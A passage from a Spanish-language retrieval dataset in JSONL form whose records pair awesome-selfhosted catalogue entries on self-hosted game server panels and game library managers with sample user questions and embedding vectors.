0.08563, 0.00344, 0.03398, 0.0226, -0.19892, 0.03116, 0.00503, -0.20274, 0.00423, -0.0116, -0.06091, 0.02186, 0.0162, 0.01319, 0.01814, -0.10042, 0.06061, -0.01942, 0.11055, 0.04907, -0.06536, -0.01073, 0.07598, -0.01049, -0.03989, 0.0108, 0.00447, 0.01078, 0.05699, -0.07723, 0.12319, -0.13792, -0.07348, 0.01822, -0.06782, 0.06296, -0.03506, 0.02786, 0.04734, -0.07038, 0.1118, 0.04546, -0.05984, 0.16521, -0.01633, 0.04309, 0.0666, 0.03446, 0.00753, -0.04759, 0.05714, -0.11969, 0.15648, 0.09656, -0.14081, -0.04046, -0.00325, 0.08842, 0.00977, -0.0402, 0.01922, -0.05541, 0.02613, -0.04868, 0.04557, 0.07859, 0.04754, -0.0556, -0.04071, 0.08233, 0.04008, 0.09141, -0.00132, -0.03822, 0.04735, 0.00451, 0.02789, -0.00693, -0.05643, -0.04919, 0.01122, -0.07408, -0.02716, 0.08428, -0.01378, -0.01242, -0.05054, 0.02531, 0.08718, 0.02368, -0.0179, 0.12741, -0.01454, 0.07708, -0.09145, 0.04812, 0.05153, 0.00957, -0.01445, -0.02005, 0.02032, -0.09347, -0.02549, 0.01878, -0.03036, -0.14027, 0.11576, 0.01979, -0.00302, -0.0074, 0.04181, 0.02872, -0.01267, 0.00329, 0.09514, 0.06055, 0.05554, -0.02598, 0.06337, 0.05829, -0.06165, -0.02406, -0.01236, -0.05749, -0.07733, -0.00122, 0.0135, -0.07586, -0.00024, -0.02014, 0.04062, -0.08519, -0.03539, -0.03237, 0.02235, -0.02281, 0.03071, 0.01473, 0.00936, -0.04958, 0.05157, -0.01, -0.04494, -0.02269, -0.00855, -0.01108, -0.04705, 0.00657, -0.02407, -0.05165, -0.02413, 0.03271, 0.05107, -0.03579, 0.02926, 0.05897, 0.03964, -0.01817, -0.00646, 0.05682, -0.00244, 0.02963, -0.04186, 0.08116, -0.03532, 0.0573, -0.0127, -0.0357, 0.00049, 0.02546, 0.00289, 0.01909, 0.02191, 0.01519, 0.02383, 0.0296, -0.00244, -0.01109, -0.02824, -0.01745, 0.016, 0.00931, -0.05222, 0.05566, -0.00747, -0.038, -0.06281, -0.02035, 0.06691, 0.00712, -0.05163, -0.00067, -0.04947, -0.01379, 0.00074, -0.05887, -0.01999, -0.0392, -0.00384, 0.04134, -0.02966, 0.00476, 0.01877]} +{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: auto-mcs β€” Cross-platform Minecraft server manager [AGPL-3.0, Python]. Calagopus β€” Modern game server management panel. Deploy, monitor, and manage Minecraft, Hytale, and other game servers with industry-leading performance [MIT, Rust/Docker/deb]. Crafty Controller β€” Minecraft launcher and manager that allows users to start and administer Minecraft servers from a user-friendly interface [GPL-3.0, Docker/Python]. Drop β€” Game distribution platform, designed for distributing and sharing DRM-free games efficiently (alternative to Steam, GameVault) [AGPL-3.0, Docker]. EasyWI β€” Easy-Wi is a Web-interface that allows you to manage server daemons like gameservers. In addition it provides you with a CMS which includes a fully automated game- and voiceserver lending service [GPL-3.0, PHP/Shell]. GameAP β€” Game Administration Panel for managing game servers on Linux and Windows [MIT, Go/Docker].", "indexar": "con que puedo montar y gestionar varios servidores de juegos al mismo tiempo?", "v": [-0.08561, 0.11013, -0.15221, -0.1393, -0.1531, 0.02272, -0.01749, -0.01425, -0.07739, -0.16893, -0.04658, 0.02543, 0.11029, -0.01477, 0.12978, 0.05793, 0.15804, -0.0704, 0.01268, 0.10416, -0.00426, -0.04052, 0.07362, -0.06391, -0.07603, 0.0733, 0.10151, -0.14993, -0.10171, 0.06783, -0.04158, 0.01317, 0.07661, -0.10034, 0.0177, -0.0963, -0.04868, 0.15378, -0.00139, 0.02326, -0.01615, 0.01161, -0.08059, -0.05784, 0.07541, 0.02007, 0.05022, -0.09292, 0.03782, -0.04447, -0.03211, -0.02386, -0.05372, -0.07334, -0.0621, -0.07064, 0.10488, -0.06632, 0.01807, -0.0554, -0.12176, 0.13152, -0.02889, 0.06145, 0.04962, 0.02153, 0.01939, 0.00069, -0.1085, 0.01493, -0.11752, -0.0079, -0.07235, -0.01661, -0.01249, 0.04265, -0.01977, 0.01145, 0.03361, 0.05053, -0.02516, -0.06176, -0.0943, 0.11931, -0.1182, -0.0533, -0.0056, -0.08349, -0.02452, 0.01883, 0.02936, 0.00463, -0.02367, -0.01687, -0.04084, -0.06543, 0.11613, 0.0239, 0.03416, 0.05388, -0.02979, 0.0785, -0.04129, 0.10608, -0.08923, 0.08298, 0.1022, -0.08317, 0.11922, -0.084, -0.02756, -0.01546, -0.07657, 0.04147, -0.01737, -0.07425, 0.01278, -0.02483, 0.02112, 0.08072, -0.09671, 0.01438, 0.13579, 0.06477, 0.08697, -0.07498, 0.1093, 0.01621, -0.00709, -0.04897, -0.05245, -0.00983, -0.0342, -0.00677, -0.10987, 0.02339, 0.02613, 0.05574, -0.04835, -0.04469, -0.00238, 0.0606, 0.02062, -0.01222, 0.12219, 0.00476, 0.07491, -0.11043, 0.00123, -0.03221, 0.04837, 0.0288, 0.02875, 0.06155, -0.06893, 0.02264, 0.0491, -0.01162, -0.08171, 0.02581, -0.02368, 0.07621, -0.03042, 0.07086, 0.03993, 0.00232, -0.00733, 0.06517, 0.05278, -0.01079, -0.07919, 0.0427, 0.02225, -0.05509, 0.03314, -0.01623, -0.09128, -0.03747, 0.02821, -0.00138, 0.02864, 0.01815, -0.02061, 0.04804, -0.12105, -0.07309, -0.03108, 0.02996, -0.04003, 0.01265, 0.02601, 0.01821, -0.05862, 0.07687, 0.05605, -0.06987, 0.00454, -0.01472, -0.00669, 0.00703, 0.01537, -0.01021, 0.00355, -0.00802, -0.02974, 0.01095, -0.06226, 0.11621, -0.00658, 0.01295, 0.0341, 0.03111, 0.09132, -0.04287, -0.00043, -0.03373, 0.06739, -0.05918, -0.03817, -0.01576, -0.01047, 0.03008, 0.08622, -0.02791, -0.03015, 0.0026, 0.06515, 0.06437, 0.05711, 0.03508, -0.03938, 0.045, -0.02741, 0.00318, 0.00196, 0.00341, 0.10146, -0.0524, -0.03065, -0.0138, 0.04979, 0.06183, -0.00273, -0.04363, -0.06025, -0.10987, -0.05201, -0.01469, -0.03879, -0.06738, -0.03524, -0.01492, -0.01866, -0.00583, -0.04688, -0.03853]} +{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: auto-mcs β€” Cross-platform Minecraft server manager [AGPL-3.0, Python]. Calagopus β€” Modern game server management panel. Deploy, monitor, and manage Minecraft, Hytale, and other game servers with industry-leading performance [MIT, Rust/Docker/deb]. Crafty Controller β€” Minecraft launcher and manager that allows users to start and administer Minecraft servers from a user-friendly interface [GPL-3.0, Docker/Python]. Drop β€” Game distribution platform, designed for distributing and sharing DRM-free games efficiently (alternative to Steam, GameVault) [AGPL-3.0, Docker]. EasyWI β€” Easy-Wi is a Web-interface that allows you to manage server daemons like gameservers. In addition it provides you with a CMS which includes a fully automated game- and voiceserver lending service [GPL-3.0, PHP/Shell]. GameAP β€” Game Administration Panel for managing game servers on Linux and Windows [MIT, Go/Docker].", "indexar": "cual es una alternativa libre a Steam o GameVault para distribuir juegos?", "v": [-0.18327, 0.00723, -0.04521, -0.10276, -0.0895, 0.00469, -0.13145, -0.0699, 0.04185, -0.07035, -0.07407, -0.12705, -0.10134, 0.00855, 0.05661, -0.02262, 0.06913, -0.0261, 0.10799, -0.00548, -0.0212, -0.01025, -0.07966, -0.20036, -0.05576, 0.05761, 0.04283, 0.03233, -0.07097, 0.0419, 0.00061, -0.1176, 0.13938, -0.21141, 0.01443, -0.16642, 0.11714, -0.01452, 0.15788, 0.06456, 0.04413, -0.0121, 0.00223, -0.03769, 0.00691, -0.00725, -0.04184, 0.02497, 0.03775, -0.07318, -0.03876, 0.06414, -0.05283, -0.13414, 0.10625, -0.02801, 0.06827, -0.13367, -0.03917, -0.04829, -0.09569, -0.04277, 0.07885, -0.0829, -0.0041, 0.08454, -0.15441, -0.00233, -0.04192, 0.17562, -0.01748, 0.03853, 0.00998, 0.05296, -0.06046, 0.04039, -0.07547, -0.05808, 0.03616, 0.03936, 0.06712, -0.13195, 0.03118, 0.03692, 0.03579, -0.07002, 0.0733, -0.11396, 0.00982, 0.01772, 0.02209, -0.0747, -0.08712, 0.12283, -0.0034, -0.19531, 0.09082, 0.00581, 0.03738, 0.06025, -0.04281, -0.00424, -0.10163, 0.03584, -0.07912, -0.06472, 0.03726, -0.02254, -0.03216, -0.00545, 0.01294, 0.04546, -0.03116, 0.10175, 0.04608, -0.01203, -0.02416, -0.02315, 0.14002, 0.05815, -0.06015, 0.01, 0.04767, 0.0135, 0.02356, -0.04373, -0.01602, 0.03812, -0.09051, -0.01604, 0.03049, -0.06679, -0.04543, 0.04475, -0.16609, -0.07232, 0.07221, 0.03022, -0.02577, 0.01893, 0.05466, 0.04194, 0.05921, 0.01238, 0.04564, 0.04154, 0.06925, -0.03361, -0.001, -0.09007, 0.01624, 0.04768, -0.00921, 0.02101, 0.02557, 0.07802, 0.00244, 0.04178, -0.12642, 0.05765, 0.04273, 0.011, -0.019, -0.00045, 0.01049, 0.00632, 0.05943, -0.00099, -0.03651, -0.01371, -0.03118, 0.03941, -0.00019, -0.03039, 0.02012, -0.00301, -0.02794, 0.00222, -0.02577, -0.02466, 0.02841, -0.0038, -0.04849, 0.005, -0.08386, -0.07167, 0.00537, -0.05692, 0.02813, 0.04011, -0.03145, 0.01059, -0.0699, -0.02898, 0.0157, 0.00634, 0.07392, -0.0726, -0.01605, 0.01835, -0.01308, 0.00714, -0.07086, -0.03171, -0.04884, 0.00355, 0.01304, -0.01356, -0.05026, 0.03463, 0.05926, 0.02053, 0.07559, 0.05256, 0.01632, -0.012, 0.05749, -0.04226, 0.02638, -0.03656, -0.00647, -0.01027, 0.06339, -0.06675, -0.00544, 0.00513, 0.04163, 0.03202, -0.01933, -0.00987, 0.03139, 0.02475, 0.03067, 0.04389, 0.00921, 0.04735, 0.02321, 0.03271, -0.02446, -0.00163, 0.0363, -0.01527, -0.01404, -0.04568, -0.05531, -0.07727, -0.04788, -0.04734, -0.06753, -0.05702, -0.07026, -0.07176, 0.01039, -0.02006, -0.02156, 0.02083]} +{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: Gameyfin β€” Video game library manager with automatic scanning, web access, downloads, and plugin support [AGPL-3.0, Docker]. Gaseous Server β€” Game ROM manager with a built-in web-based emulator using multiple sources to identify and provide metadata [⚠, AGPL-3.0, Docker/.NET]. Lancache β€” LAN Party game caching made easy [⚠, MIT, Docker/Shell]. LinuxGSM β€” CLI tool for deployment and management of dedicated game servers on Linux: more than 120 games are supported [MIT, Shell]. Minus Games β€” Sync games and save files across multiple devices [MIT, Rust]. Ownfoil β€” Nintendo Switch library manager, with automated management tasks (file identification and organization, missing updates/DLC), serving your library to multiple supported clients on your Switch, with shop customization and multi user authentication [AGPL-3.0, Docker/Python].", "indexar": "que programa puedo usar para gestionar mi biblioteca de videojuegos localmente?", "v": [0.12842, 0.07165, -0.06467, -0.18731, -0.03854, -0.04845, -0.07098, -0.09555, -0.03965, -0.2534, 0.00215, -0.14895, -0.04594, 0.06767, -0.03056, 0.00464, 0.11977, -0.1134, 0.06092, -0.06635, 0.07393, 0.03965, -0.04814, 0.00887, 0.01732, 0.06123, 0.11712, -0.0629, -0.05609, 0.04196, -0.05599, 0.01278, 0.07449, -0.14642, -0.00744, -0.04745, 0.07519, 0.01883, 0.04573, 0.01675, 0.05623, 0.07018, -0.00328, -0.01304, 0.05413, -0.04734, 0.17363, -0.08064, -0.04342, 0.00979, -0.03621, -0.02922, -0.03431, -0.03477, 0.09427, -0.07751, 0.01108, -0.14544, 0.00246, -0.03782, -0.13568, -0.00087, 0.02149, -0.02713, 0.07529, 0.03713, 0.06827, 0.04539, -0.14436, 0.1665, -0.10497, 0.05888, 0.06088, 0.04965, -0.05763, 0.06956, -0.00734, -0.02745, 0.0927, -0.05618, -0.02487, -0.07907, 0.02399, -0.00618, -0.1146, 0.01949, 0.02874, -0.09509, 0.07745, -0.07831, -0.08541, -0.02161, -0.09241, -0.09244, 0.09572, -0.11716, 0.1106, 0.03565, 0.03129, 0.07665, 0.0194, -0.01068, -0.05401, 0.13625, -0.06245, -0.03791, 0.02215, -0.04317, -0.00654, -0.0937, 0.02415, 0.02615, -0.02214, 0.02185, -0.06209, 0.07225, 0.02801, -0.00764, 0.13699, 0.09632, -0.135, -0.0145, 0.03228, -0.08049, 0.12089, 0.01111, 0.02035, 0.02181, -0.06593, 0.00436, -0.00774, -0.04142, -0.02931, -0.00181, -0.08417, 0.01787, -0.02831, -0.05761, -0.03081, 0.01453, 0.04208, 0.0628, -0.00211, 0.06005, 0.00899, -0.03488, 0.07193, -0.03927, 0.03352, -0.02998, 0.09009, -0.06254, 0.03782, 0.00953, -0.01541, 0.11764, 0.10038, -0.01603, -0.12234, -0.01933, -0.02049, 0.03941, 0.00235, -0.04473, -0.03747, -0.04386, 0.06121, 0.05069, 0.04945, 0.03534, -0.07052, 0.03161, 0.01757, -0.04906, 0.01087, -0.03048, -0.00318, 0.00086, -0.00579, 0.04562, -0.0502, 0.02587, 0.0287, 0.03577, -0.12338, -0.06034, -0.01638, 0.0057, -0.04267, -0.03808, -0.05591, 0.03306, 0.0246, 0.01028, 0.04224, 0.00456, 0.03203, 0.03006, -0.03105, -0.04633, 0.05189, 0.07462, -0.02712, 0.03153, 0.03109, 0.03644, -0.02769, 0.03994, 0.02774, 0.01033, 0.00152, 0.03963, 0.0498, 0.07186, 0.01133, -0.08953, -0.02507, 0.06384, 0.0199, -0.10606, 0.00664, -0.01093, 0.08151, 0.00895, 0.0117, -0.0272, 0.00825, -0.00184, 0.00971, 0.00935, -0.02182, -0.03456, 0.0243, 0.01519, -0.01825, 0.00418, 0.04339, 0.02852, -0.05201, -0.03001, -0.04679, 0.05463, -0.03978, -0.05595, -0.05756, -0.03667, -0.09317, -0.02936, -0.04521, -0.03542, -0.05094, -0.0285, 0.016, -0.01028, -0.02387, 0.07136]} +{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: Gameyfin β€” Video game library manager with automatic scanning, web access, downloads, and plugin support [AGPL-3.0, Docker]. Gaseous Server β€” Game ROM manager with a built-in web-based emulator using multiple sources to identify and provide metadata [⚠, AGPL-3.0, Docker/.NET]. Lancache β€” LAN Party game caching made easy [⚠, MIT, Docker/Shell]. LinuxGSM β€” CLI tool for deployment and management of dedicated game servers on Linux: more than 120 games are supported [MIT, Shell]. Minus Games β€” Sync games and save files across multiple devices [MIT, Rust]. Ownfoil β€” Nintendo Switch library manager, with automated management tasks (file identification and organization, missing updates/DLC), serving your library to multiple supported clients on your Switch, with shop customization and multi user authentication [AGPL-3.0, Docker/Python].", "indexar": "con que herramienta puedo montar un servidor dedicado para muchos juegos diferentes desde la lΓ­nea de comandos?", "v": [0.03015, 0.12, -0.16603, -0.13604, -0.15134, -0.06452, -0.03203, 0.00164, -0.08321, -0.07064, -0.04257, 0.00023, 0.06635, -0.11984, 0.06007, 0.081, 0.19902, -0.07237, -0.02257, 0.00445, -0.00836, -0.05108, -0.02022, -0.09962, -0.04457, 0.01465, 0.11296, -0.09755, -0.15869, 0.04611, -0.01862, 0.0454, 0.07126, -0.02735, -0.02291, -0.16158, -0.03521, 0.09653, -0.03853, 0.07892, -0.04383, 0.0129, -0.13518, -0.04068, 0.01756, -0.03412, 0.04491, -0.00936, 0.05007, -0.03252, 0.01174, -0.11042, -0.07562, -0.04318, -0.04846, -0.10916, 0.22527, -0.11864, 0.08629, -0.06607, -0.1136, -0.00125, -0.01323, -0.00323, 0.06423, 0.00341, -0.07482, -0.12397, -0.12192, -0.00163, -0.0934, 0.02387, -0.04484, 0.00717, 0.04418, 0.05024, -0.01159, 0.0284, 0.08581, 0.01528, 0.0222, -0.00282, -0.06861, 0.12566, -0.07148, -0.09916, -0.01036, -0.04268, 0.02999, -0.01265, 0.08878, 0.08529, -0.07071, 0.05253, -0.01403, -0.06824, 0.08481, 0.01993, 0.09841, 0.00937, 0.06832, 0.04458, -0.08814, 0.14064, 0.00622, 0.04445, 0.08593, -0.07529, 0.03241, 0.00195, 0.03694, -0.04409, -0.01761, 0.02626, -0.05007, -0.06759, 0.00599, -0.03221, 0.05784, -0.00479, -0.08836, 0.04873, 0.08992, 0.05339, 0.05575, -0.08223, -0.02354, 0.07207, 0.01238, -0.08031, -0.03449, 0.01086, -0.03074, -0.02603, -0.08642, 0.07816, 0.04375, -0.04007, -0.10071, -0.07746, 0.0611, 0.04115, -0.00363, -0.03463, 0.08015, 0.01376, 0.04767, -0.14707, -0.08547, -0.02944, 0.10821, 0.02798, -0.02239, 0.00823, -0.08135, 0.03574, 0.00138, -0.01312, -0.06961, 0.06348, -0.03354, -0.00583, 0.04673, 0.02101, 0.03407, -0.03126, -0.05527, 0.04583, 0.04555, 0.02091, -0.03283, 0.07116, 0.03238, -0.0533, 0.02592, -0.04704, -0.07281, -0.00838, 0.02809, -0.06723, -0.077, -0.01682, -0.05146, -0.01085, -0.04442, -0.07753, 0.01882, -0.05902, 0.0214, 0.01466, 0.0183, 0.05937, -0.08211, 0.00383, 0.04079, -0.04251, 0.0229, -0.04035, 0.00262, -0.0348, -0.07352, 0.00159, -0.01198, -0.07402, -0.00949, 0.04775, -0.03219, 0.03649, -0.00325, 0.04101, 0.05418, -0.06229, 0.07092, -0.02407, 0.00854, -0.05469, 0.05596, -0.03902, -0.03546, 0.0034, 0.00575, -0.00855, 0.04909, -0.01217, -0.0213, 0.0351, 0.01698, -0.00251, 0.05491, 0.01197, 0.00917, -0.01286, -0.04367, -0.04408, 0.02797, 0.02714, 0.06246, -0.00287, -0.06208, -0.03441, 0.00095, 0.04893, 0.0053, -0.06918, -0.02732, -0.13071, -0.04561, -0.01893, -0.05225, -0.06779, -0.02761, -0.02036, 0.02859, -0.05761, -0.04485, -0.05125]} +{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: Gameyfin β€” Video game library manager with automatic scanning, web access, downloads, and plugin support [AGPL-3.0, Docker]. Gaseous Server β€” Game ROM manager with a built-in web-based emulator using multiple sources to identify and provide metadata [⚠, AGPL-3.0, Docker/.NET]. Lancache β€” LAN Party game caching made easy [⚠, MIT, Docker/Shell]. LinuxGSM β€” CLI tool for deployment and management of dedicated game servers on Linux: more than 120 games are supported [MIT, Shell]. Minus Games β€” Sync games and save files across multiple devices [MIT, Rust]. Ownfoil β€” Nintendo Switch library manager, with automated management tasks (file identification and organization, missing updates/DLC), serving your library to multiple supported clients on your Switch, with shop customization and multi user authentication [AGPL-3.0, Docker/Python].", "indexar": "cual es una alternativa libre a los gestores de Nintendo Switch existentes?", "v": [-0.04663, 0.02081, -0.09372, -0.09024, -0.03036, 0.0046, -0.15526, -0.14595, -0.15501, -0.09261, 0.00085, -0.09009, -0.03926, 0.01106, 0.05704, -0.03055, 0.08424, -0.08092, 0.12062, 0.05498, -0.10059, 0.01707, 0.12019, -0.08767, 0.02398, -0.02289, 0.06424, -0.06018, -0.07618, 0.05545, 0.00653, -0.07364, 0.05041, -0.04089, 0.00502, -0.01786, 0.00182, 0.02563, -0.00167, -0.08563, 0.15005, -0.04787, -0.02121, -0.08331, 0.05585, -0.11878, -0.00878, -0.02873, 0.07533, 0.07173, -0.08278, 0.02095, -0.07562, -0.01734, 0.07977, -0.02589, 0.18692, 0.03302, -0.03879, 0.02482, -0.1443, -0.00225, 0.067, -0.01925, 0.00375, -0.01668, -0.09476, 0.02878, -0.14347, 0.10102, -0.03222, -0.03838, -0.02804, 0.0405, -0.10122, 0.17634, -0.02392, 0.06899, 0.0036, 0.00583, 0.0651, -0.06834, -0.05967, 0.02459, 0.01878, 0.00455, 0.03497, -0.29135, -0.05212, -0.08195, -0.04142, -0.05032, 0.03545, 0.10315, 0.02041, -0.05149, -0.00858, 0.09639, 0.02689, 0.05193, -0.03113, 0.12997, -0.08813, 0.13782, -0.05687, 0.01269, 0.05194, -0.0255, -0.04089, 0.00916, -0.08487, 0.07543, 0.07106, -0.00677, 0.03072, 0.01292, -0.08711, -0.01137, 0.06656, 0.10436, -0.04, -0.00609, 0.01394, 0.01369, 0.08363, 0.06307, 0.04032, 0.07799, 0.00576, 0.05314, 0.08723, -0.03872, -0.03407, -0.02878, -0.11314, 0.03925, 0.10292, 0.00107, 0.03875, 0.00284, 0.02456, 0.04298, 0.09924, -0.05139, 0.09116, -0.02463, 0.04819, 0.02209, -0.01257, 0.0304, -0.06823, 0.02072, -0.01647, 0.05498, -0.03042, 0.0866, -0.05567, 0.06692, -0.11241, 0.0947, -0.0222, -0.05412, -0.0465, 0.05905, -0.08882, 0.02314, -0.04963, 0.00217, -0.0094, -0.01374, -0.01825, 0.01661, 0.07011, 0.00821, 0.05763, -0.05376, -0.06968, -0.05094, 0.07721, -0.07902, 0.06816, -0.0138, -0.0379, 0.05142, -0.08738, -0.06224, -0.06191, 0.03607, 0.01188, 0.00744, 0.03501, 0.04038, -0.03969, -0.06196, 0.05363, -0.02994, -0.0309, -0.0723, -0.02194, -0.01866, -0.0356, -0.04492, -0.04335, -0.00614, -0.02855, 0.00012, -0.04103, 0.03116, -0.00849, 0.05068, 0.05587, 0.02397, 0.07329, 0.05966, 0.01534, -0.06126, 0.00328, 0.0099, 0.09079, -0.0616, 0.06397, 0.03484, 0.06487, -0.0039, -0.03888, 0.02838, 0.01777, 0.04694, -0.03957, 0.01426, 0.00836, 0.00233, 0.02852, 0.02636, -0.03565, 0.03594, 0.07245, -0.01058, -0.00091, -0.02979, 0.01297, 0.00319, -0.0291, -0.02295, -0.04402, -0.03963, -0.07124, -0.03862, -0.02452, -0.04573, 0.01358, -0.01116, 0.00331, 0.03596, -0.0045, 0.00599]} +{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: Pelican Panel β€” Web application for easy management of game servers, offering a user-friendly interface for deploying, configuring, and managing servers, server monitoring tools, and extensive customization options (fork of Pterodactyl) [AGPL-3.0, PHP/Docker]. Pterodactyl β€” Management panel for game servers, with an intuitive UI for end users [MIT, PHP]. PufferPanel β€” Game server management panel designed for both small networks and game server providers [Apache-2.0, Go]. Retrom β€” Private cloud game library distribution server + frontend/launcher [GPL-3.0, Docker/Rust]. RomM β€” ROM manager for organizing, enriching, and playing retro games, with support for 400+ platforms [⚠, AGPL-3.0, Docker]. SourceBans++ β€” Admin, ban, and communication management system for games running on the Source engine [CC-BY-SA-4.0, PHP]. Sunshine β€” Remote game stream host for Moonlight with support up to 120 frames per second and 4K resolution [GPL-3.0, C++/deb/Docker].", "indexar": "quΓ© panel de administraciΓ³n sirve para gestionar servidores de videojuegos fΓ‘cilmente?", "v": [0.03897, 0.0317, -0.01943, -0.23836, -0.03636, -0.06301, 0.0474, -0.17441, 0.03772, -0.1351, -0.05292, -0.12491, -0.00544, -0.03732, 0.04326, 0.10053, 0.18277, -0.07634, 0.05343, 0.04163, 0.02768, 0.03949, 0.029, -0.01955, -0.09453, 0.10726, 0.09605, -0.15096, -0.07934, -0.005, -0.03098, -0.03095, 0.02088, -0.10514, 0.00293, -0.00806, -0.03737, 0.13856, -0.02355, 0.15335, 0.00186, -0.00187, -0.06762, -0.05823, 0.0598, -0.07078, 0.11902, -0.08195, 0.07064, -0.03822, -0.10204, -0.0972, -0.05764, -0.02264, 0.03224, 0.00159, -0.0444, -0.11153, 0.07522, -0.0332, -0.20881, 0.0491, 0.01943, 0.03565, 0.00087, 0.05871, 0.01875, -0.04248, -0.06609, 0.08321, -0.06896, 0.02269, 0.01699, 0.00271, -0.02053, 0.04275, -0.03698, 0.01843, 0.00881, 0.03283, 0.04245, -0.02479, -0.13828, 0.02598, -0.11596, -0.05551, -0.08996, -0.0374, -0.01154, -0.04993, -0.03724, -0.05646, -0.06728, -0.08062, 0.01003, 0.00202, 0.07954, -0.06426, 0.02501, 0.05241, 0.05576, 0.02468, -0.06464, 0.09234, -0.10444, 0.09979, 0.05783, -0.09028, -0.00938, -0.10018, 0.02559, 0.00962, -0.03511, 0.12577, 0.01657, -0.00385, -0.06806, 0.04072, 0.03093, 0.10496, -0.05795, -0.05149, 0.15181, -0.00678, 0.08397, -0.06923, 0.07533, 0.00119, -0.01929, -0.06235, 0.02482, -0.08811, -0.04845, 0.08248, -0.05418, 0.02227, 0.01816, 0.02641, -0.06687, -0.01804, 0.03621, 0.10747, 0.02436, 0.03392, 0.05954, -0.01872, 0.14228, -0.02807, 0.06202, 0.03893, 0.07552, -0.05442, 0.03842, 0.00644, -0.04249, 0.02786, -0.00574, -0.0209, -0.12908, -0.00787, -0.01579, 0.02153, -0.0041, 0.1091, 0.00228, -0.00598, 0.01191, 0.10862, 0.02994, 0.00713, -0.02491, 0.0092, 0.00632, -0.04429, 0.02256, -0.01893, -0.04725, -0.00045, 0.01447, 0.00165, 0.00196, -0.00251, -0.02538, 0.10008, -0.07621, -0.05524, -0.04061, -0.01229, -0.02257, 0.05445, 0.01877, 0.01417, -0.03847, -0.00785, 0.07136, -0.01671, 0.02822, -0.03749, -0.06868, -0.01003, 0.08071, 0.04296, 0.01235, -0.01471, -0.05205, 0.0316, -0.02425, 0.05047, 0.03649, 0.02834, 0.00239, 0.08465, 0.05666, 0.05438, 0.05822, -0.05193, 0.0602, 0.00374, 0.01389, -0.07073, 0.00184, 0.00592, 0.01771, -0.00621, 0.0271, 0.0496, -0.00196, 0.04176, -0.02383, -0.03678, -0.01414, 0.07177, 0.02763, 0.07683, -0.0753, -0.02142, 0.04739, -0.01281, -0.03817, -0.0015, 0.00365, 0.00835, -0.0477, -0.0646, -0.02161, -0.09673, 0.01308, -0.05191, -0.07991, -0.02254, -0.04873, -0.07366, -0.01816, 0.07267, -0.07983, 0.03676]} +{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: Pelican Panel β€” Web application for easy management of game servers, offering a user-friendly interface for deploying, configuring, and managing servers, server monitoring tools, and extensive customization options (fork of Pterodactyl) [AGPL-3.0, PHP/Docker]. Pterodactyl β€” Management panel for game servers, with an intuitive UI for end users [MIT, PHP]. PufferPanel β€” Game server management panel designed for both small networks and game server providers [Apache-2.0, Go]. Retrom β€” Private cloud game library distribution server + frontend/launcher [GPL-3.0, Docker/Rust]. RomM β€” ROM manager for organizing, enriching, and playing retro games, with support for 400+ platforms [⚠, AGPL-3.0, Docker]. SourceBans++ β€” Admin, ban, and communication management system for games running on the Source engine [CC-BY-SA-4.0, PHP]. Sunshine β€” Remote game stream host for Moonlight with support up to 120 frames per second and 4K resolution [GPL-3.0, C++/deb/Docker].", "indexar": "hay alguna herramienta para distribuir una biblioteca privada de juegos retro con un lanzador incluido?", "v": [-0.01806, 0.08384, -0.15504, -0.19131, -0.08735, -0.10854, -0.11439, 0.04382, -0.08837, -0.1643, -0.03578, -0.06926, -0.02621, -0.02858, 0.09065, -0.03694, 0.03675, -0.05011, 0.07549, -0.07678, 0.02998, 0.15409, -0.14087, -0.12856, 0.00213, -0.04898, 0.08054, -0.05724, -0.16191, 0.18037, -0.0626, -0.02183, 0.05976, -0.08824, -0.10336, -0.0796, 0.15597, 0.02947, -0.00739, 0.01861, 0.07467, 0.073, -0.03738, 0.04719, -0.0038, -0.00184, 0.03143, 0.02383, 0.00763, 0.0191, -0.06009, -0.12136, -0.09072, -0.06417, 0.10719, -0.19064, 0.04684, -0.03465, -0.00128, -0.09544, -0.10322, 0.06246, -0.00457, -0.15654, 0.01141, -0.03844, -0.09166, -0.03282, -0.10399, 0.09252, -0.00309, 0.06359, 0.04501, 0.10938, -0.06814, 0.04136, -0.02224, 0.00601, 0.07294, 0.07596, 